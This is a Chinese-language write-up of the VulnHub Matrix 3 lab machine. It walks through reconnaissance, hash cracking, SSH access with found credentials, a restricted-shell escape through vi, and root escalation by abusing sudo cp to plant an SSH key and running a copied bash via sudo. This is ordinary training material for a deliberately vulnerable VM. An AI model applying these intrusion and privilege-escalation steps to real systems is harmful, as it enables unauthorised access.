0x01靶机介绍
项目 | Value |
---|---|
项目地址 | https://www.vulnhub.com/entry/matrix-3,326/ |
镜像链接 | https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova |
作者 | Ajay Verma |
发布日期 | 2019年7月9日 |
系列 | Matrix |
难度 | 中等 |
目的 | 获取root权限 |
0x02靶机搭建
工具:VirtualBox7.0
镜像:Machine_Matrix_v3.ova
搭建方式:
1.管理–>导入虚拟机–>Machine_Matrix_v3.ova–> Finish
2.设置–>显示–>VMSVGA
网络–>桥接–>混杂模式全部允许(并记下mac号)
3.开启我们的攻击机kali(和靶机一样桥接同一个网卡)和靶机
桥接网段:192.168.3.0/24
kali的IP地址:192.168.3.59
0x03渗透流程
一、信息收集
1.主机发现
arp-scan -l
2.查看端口发现端倪
nmap -sV -p- 192.168.3.236
7331端口:
80端口(这里致敬的黑客帝国,我们可以根据上面的英文信息定位到兔子线索):
f12查看图片信息,发现上面写着Matrix是敲门砖
我们访问
http://192.168.3.236/Matrix/
需要我们解密 正确的路径为:/Matrix/n/e/o/6/4/ (黑客帝国主角叫neo,作者为所在的组织名缩写为ud64)
存在一个秘密文件secret.gz,下载下来使用记事本打开,发现一个用户名和加密的密码
admin:76a2173be6393254e72ffa4d6df1030a
去网页进行解密:passwd
二、漏洞分析和利用
1.ssh密码获取
我们进入7331端口,使用刚刚获取的用户名密码登陆,没有发现什么线索
使用dirb进行目录扫描
dirb http://192.168.3.236:7331 -u admin:passwd -w
这里存在一个data目录,我们访问下
在这里插入图片描述
下载了一个文件,具体干嘛的不知道,使用kali里的file查看一下这个文件发现为window执行文件
file data
这里需要使用反编译的工具进行反编译提取信息,我们直接参考做过的大佬提取的账户密码:guest/7R1n17yN30
远程ssh登陆
ssh guest@192.168.3.236 -p 6464
2.提权
列出当前可以执行的命令
compgen -c
我们使用vi命令进行绕过当前的低权限shell
先vi打开个空文件,然后esc输入
:!/bin/sh
得到一个sh终端
利用export修改环境变量,执行/usr/bin/bash拿到功能完全的bash shell终端。
export PATH="/usr/bin"
/usr/bin/bash
使用sudo -l查看可以用来提权的信息
可以看到trinity用户可以无密码执行/bin/cp 命令
我们使用ssh-keygen生成一个密钥,密码为空
ssh-keygen
然后把刚刚生成的密钥给给予777权限,再复制到trinity用户目录下就行了
chmod 777 .ssh/id_rsa.pub
sudo -u trinity /bin/cp .ssh/id_rsa.pub /home/trinity/.ssh/authorized_keys
使用trinity用户登陆密码123456
ssh trinity@127.0.0.1 -i .ssh/id_rsa -p 6464
sudo -l
查看当前用户可以不用密码就能以root身份执行triniry目录下的oracle
我们直接复制/usr/bin/bash 到/home/trinity下,并命名为oracle
cp /usr/bin/bash oracle
chmod +x oracle
sudo ./oracle
成功提权root
参考文章:https://cloud.tencent.com/developer/article/1472396